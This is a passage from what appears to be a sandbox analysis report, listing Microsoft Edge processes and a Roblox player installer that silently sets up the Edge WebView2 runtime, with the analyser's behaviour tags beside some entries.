  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
  2⤵
  PID:4568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8696 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8708 /prefetch:1
  2⤵
  PID:5924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:1
  2⤵
  PID:2436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
  2⤵
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8752 /prefetch:1
  2⤵
  PID:952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7736 /prefetch:1
  2⤵
  PID:2868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10152 /prefetch:1
  2⤵
  PID:5836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10164 /prefetch:1
  2⤵
  PID:3824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8432 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9164 /prefetch:1
  2⤵
  PID:980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8772 /prefetch:1
  2⤵
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8880 /prefetch:1
  2⤵
  PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10236 /prefetch:1
  2⤵
  PID:5912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
  2⤵
  PID:5476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9376 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9524 /prefetch:1
  2⤵
  PID:5680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8036 /prefetch:1
  2⤵
  PID:5908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
  2⤵
  PID:332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
  2⤵
  PID:1056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9860 /prefetch:1
  2⤵
  PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8844 /prefetch:8
  2⤵
  PID:5364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7660 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
  2⤵
  PID:3872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8712 /prefetch:1
  2⤵
  PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7832 /prefetch:1
  2⤵
  PID:3516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10416 /prefetch:1
  2⤵
  PID:6036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8540 /prefetch:1
  2⤵
  PID:5448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10412 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7864 /prefetch:1
  2⤵
  PID:3848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8788 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8672 /prefetch:1
  2⤵
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6028 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9232 /prefetch:1
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8608 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10412 /prefetch:1
  2⤵
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9252 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9368 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:2792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7788 /prefetch:1
  2⤵
  PID:5720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:6116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6988 /prefetch:8
  2⤵
  PID:932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8452 /prefetch:1
  2⤵
  PID:5720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10572 /prefetch:1
  2⤵
  PID:2124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10448 /prefetch:1
  2⤵
  PID:6600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7016 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:6724
- C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
  "C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:6828
- - C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
    MicrosoftEdgeWebview2Setup.exe /silent /install
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:2756
  - - C:\Program Files (x86)\Microsoft\Temp\EU6B1C.tmp\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\Temp\EU6B1C.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
      4⤵
      Event Triggered Execution: Image File Execution Options Injection
      Executes dropped EXE
      Loads dropped DLL
      Checks system information in the registry
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2676
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:4808
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:3780
      - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:2040
      - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:6052
      - C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:1064
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RUExRUExM0QtMkI5Ny00NzA4LTkyMUYtQUM1NzdBREQ0QTFGfSIgdXNlcmlkPSJ7RTUwM0FERkUtNDE5OC00RjY2LTlBNjEtOUQ5RDRBRTI3REVBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntBOEEwRTI4OS04OTRGLTQ1NkItOUZDNi01OTBEODE5MEY3RUZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSIiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE0My41NyIgbmV4dHZlcnNpb249IjEuMy4xNzEuMzkiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE3NjUzMTk2MTk1IiBpbnN0YWxsX3RpbWVfbXM9IjU1NCIvPjwvYXBwPjwvcmVxdWVzdD4
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6452
    - - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
